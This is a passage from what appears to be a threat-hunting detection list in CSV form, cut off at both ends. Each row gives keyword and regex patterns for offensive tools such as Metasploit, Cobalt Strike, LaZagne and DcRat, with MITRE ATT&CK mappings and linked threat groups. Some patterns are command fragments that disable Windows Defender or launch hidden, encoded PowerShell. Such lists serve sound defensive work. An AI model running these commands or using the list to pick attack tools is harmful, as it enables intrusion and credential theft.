security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62673" "*Win7ElevateDll.*",".{0,1000}Win7ElevateDll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62674" "*WINAPI KaynLoader(*",".{0,1000}WINAPI\sKaynLoader\(.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","62675" "*WinBruteLogon* -v -u*",".{0,1000}WinBruteLogon.{0,1000}\s\-v\s\-u.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62676" "*WinBruteLogon.dpr*",".{0,1000}WinBruteLogon\.dpr.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62677" 
"*WinBruteLogon.dproj*",".{0,1000}WinBruteLogon\.dproj.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62678" "*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62679" "*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62680" "*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62681" 
"*WinBruteLogon.res*",".{0,1000}WinBruteLogon\.res.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62682" "*win-brute-logon-master.zip*",".{0,1000}win\-brute\-logon\-master\.zip.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62683" "*WinCreds.exe*",".{0,1000}WinCreds\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62684" "*windapsearch --dc *",".{0,1000}windapsearch\s\-\-dc\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62685" "*windapsearch.py*",".{0,1000}windapsearch\.py.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - 
T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","62686" "*windapsearch_enum*",".{0,1000}windapsearch_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62687" "*windapsearch_py2.py*",".{0,1000}windapsearch_py2\.py.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","62688" "*windapsearch-master*",".{0,1000}windapsearch\-master.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","62689" "*WinDefenderKiller*",".{0,1000}WinDefenderKiller.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","62690" 
"*winDefKiller.exe*",".{0,1000}winDefKiller\.exe.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","62691" "*WindfarmDynamite.cdproj*",".{0,1000}WindfarmDynamite\.cdproj.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","62692" "*WindfarmDynamite.exe*",".{0,1000}WindfarmDynamite\.exe.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","62693" "*WindfarmDynamite.sln*",".{0,1000}WindfarmDynamite\.sln.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","62694" "*Windows Bind TCP ShellCode - BOF*",".{0,1000}Windows\sBind\sTCP\sShellCode\s\-\sBOF.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62695" "*Windows Credentials Editor v1.3beta*",".{0,1000}Windows\sCredentials\sEditor\sv1\.3beta.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","62696" "*Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0*",".{0,1000}Windows\sDefender\'\sDisableAntiSpyware\s1\s\-Type\sDword\s\-Force\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","62697" "*'Windows Defender has blocked some of our Features.Please Turn off Windows Defender and run again*",".{0,1000}\'Windows\sDefender\shas\sblocked\ssome\sof\sour\sFeatures\.Please\sTurn\soff\sWindows\sDefender\sand\srun\sagain.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender 
protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","62698" "*Windows Defender Security Center\\Notifications' DisableNotifications 1 -Type Dword -ea 0*",".{0,1000}Windows\sDefender\sSecurity\sCenter\\\\Notifications\'\sDisableNotifications\s1\s\-Type\sDword\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","62699" "*Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0*",".{0,1000}Windows\sDefender\sSecurity\sCenter\\Notifications\'\sDisableNotifications\s1\s\-Type\sDword\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","62700" "*Windows Defender"" DisableAntiSpyware 1 -Type Dword -Force -ea 0*",".{0,1000}Windows\sDefender\""\sDisableAntiSpyware\s1\s\-Type\sDword\s\-Force\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","62701" "*Windows Downdate: Craft any downgrading Windows Updates*",".{0,1000}Windows\sDowndate\:\sCraft\sany\sdowngrading\sWindows\sUpdates.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - 
T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","62702" "*windows go build -o proxy.exe cmd/proxy/main.go*",".{0,1000}windows\sgo\sbuild\s\-o\sproxy\.exe\scmd\/proxy\/main\.go.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","62703" "*-WindowS Hidden -ep Bypass -enc $b64FileServerMonitoringScript*",".{0,1000}\-WindowS\sHidden\s\-ep\sBypass\s\-enc\s\$b64FileServerMonitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62704" "*-WindowS Hidden -ep Bypass -enc $b64monitoringScript*",".{0,1000}\-WindowS\sHidden\s\-ep\sBypass\s\-enc\s\$b64monitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62705" "*Windows keyboard hook installed & log exfiltration timer started*",".{0,1000}Windows\skeyboard\shook\sinstalled\s\&\slog\sexfiltration\stimer\sstarted.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in 
C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","62706" "*Windows Meterpreter Staged Reverse TCP (x64*",".{0,1000}Windows\sMeterpreter\sStaged\sReverse\sTCP\s\(x64.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62707" "*Windows Meterpreter Stageless Reverse TCP (x64)*",".{0,1000}Windows\sMeterpreter\sStageless\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62708" "*Windows Staged JSP Reverse TCP*",".{0,1000}Windows\sStaged\sJSP\sReverse\sTCP.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62709" "*Windows Staged Reverse TCP (x64)*",".{0,1000}Windows\sStaged\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62710" "*Windows Stageless Reverse TCP (x64)*",".{0,1000}Windows\sStageless\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","62711" "*windows*lsa_secrets.py*",".{0,1000}windows.{0,1000}lsa_secrets\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","62712" "*windows/beacon_smb/*",".{0,1000}windows\/beacon_smb\/.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike default content strings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","62717" "*windows/c_payload_util*",".{0,1000}windows\/c_payload_util.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62718" "*windows/gather/cachedump*",".{0,1000}windows\/gather\/cachedump.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","62719" "*windows/gather/hashdump*",".{0,1000}windows\/gather\/hashdump.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","62720" "*Windows/lazagne.spec*",".{0,1000}Windows\/lazagne\.spec.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","62721" "*windows/meterpreter/bind_tcp*",".{0,1000}windows\/meterpreter\/bind_tcp.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62722" "*windows/meterpreter/reverse_https*",".{0,1000}windows\/meterpreter\/reverse_https.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62723" 
"*windows/samdump.go*",".{0,1000}windows\/samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","62724" "*windows/shell_reverse_tcp*",".{0,1000}windows\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62725" "*windows/smb/ms17_010_psexec*",".{0,1000}windows\/smb\/ms17_010_psexec.{0,1000}","offensive_tool_keyword","metasploit","exploit used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62726" "*Windows/System32/cmdlol.exe*",".{0,1000}Windows\/System32\/cmdlol\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","62727" "*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Defense 
